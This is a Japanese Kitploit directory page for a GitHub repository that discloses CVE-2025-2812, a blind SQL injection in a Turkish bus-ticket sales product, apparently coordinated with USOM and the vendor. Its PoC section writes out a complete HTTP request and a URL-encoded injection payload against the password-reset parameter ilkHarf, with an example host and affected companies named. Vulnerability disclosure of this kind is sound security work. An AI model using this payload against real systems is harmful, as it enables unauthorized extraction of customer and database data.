Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-2812 — CVE-2025-2812 SQLインジェクション | Kitploit
ツール/GitHubGitHub/sahici/cve-2025-2812
脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテストデータベースセキュリティ
GitHubsahici/cve-2025-2812

CVE-2025-2812

CVE-2025-2812 SQLインジェクション

リポジトリを見る
1年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
ウェブサイト

CVE-2025-2812 — Mydata Bilişim Ltd. Şti 製「Bilet Satış Otomasyonu」におけるSQLインジェクションの脆弱性

📌 CVE-ID: CVE-2025-2812
📢 USOM 通知: tr-25-0099
🛡️ 脆弱性タイプ: CWE-89 - SQL Injection (Boolean-based Blind)
🏢 影響を受ける製品: Bilet Satış Otomasyonu – Mydata Bilişim Ltd. Şti
🌐 対象URL例: https://otobusfirmasi.com.tr/otobus-bileti/SifremiUnuttum.php


🔍 脆弱性の概要

「Bilet Satış Otomasyonu」製品において、パスワードリセット (SifremiUnuttum.php) ページの "Adınızın ilk harfi" (ilkHarf) パラメータに Boolean-based Blind SQL Injection の脆弱性が検出されました。この脆弱性により、ユーザー名やパスワードなしでシステムからデータを流出させることが可能です。

この脆弱性は、以下のバス会社のシステムに影響を及ぼします:

  • Balıkesir Uludağ
  • Kontur
  • Efe Tur
  • Kale Seyahat
  • +20社

💥 PoC (Proof of Concept)

📌 HTTP リクエスト:

root@kitploit:~
GET /otobus-bileti/SifremiUnuttumBilgi.php?TelefonNo=12313131231312313&ilkHarf=a')%20OR%20NOT%20LENGTH(LENGTH((SELECT%20SCHEMA_NAME%20FROM(INFORMATION_SCHEMA.SCHEMATA)LIMIT%200,1)))=1--%20wXyW HTTP/1.1
Host: otobusfirmasi.com.tr
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: https://otobusfirmasi.com.tr/otobus-bileti/SifremiUnuttum.php
Cookie: PHPSESSID=***************

🧪 使用されたペイロード:

root@kitploit:~
TelefonNo=12313131231312313&ilkHarf=a')%20OR%20NOT%20LENGTH(LENGTH((SELECT%20SCHEMA_NAME%20FROM(INFORMATION_SCHEMA.SCHEMATA)LIMIT%200,1)))=1--%20wXyW

🧠 技術詳細

  • 脆弱性のあるパラメータ: ilkHarf
  • 手法: Boolean-based Blind SQLi
  • 脆弱性の種類: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

🙏 謝辞

「Mydata Bilişim Ltd. Şti」によって開発された「Bilet Satış Otomasyonu」製品で検出した脆弱性後、CVE-2025-2812 コードで公表されたこの脆弱性は、製造元と USOM の連携により発表されました。 このプロセスを通じてサイバーセキュリティコミュニティに貢献できることを誇りに思います。

脆弱性の報告を受けて、Mydata Bilişim Ltd. Şti は必要なすべての手順を迅速に実施し、関連するセキュリティホールを修正して、システムに追加のセキュリティ対策を統合しました。プロセスにおいて示された透明性、協力、責任感に対して感謝申し上げます。

このプロセスを通じてサイバーセキュリティコミュニティに貢献できることを誇りに思います。


📬 連絡先

ご質問、フィードバック、コラボレーションなどは、お気軽にご連絡ください:

  • 📧 メール: [email protected]
  • 📷 Instagram: @yyasar.yasin
ツールをダウンロード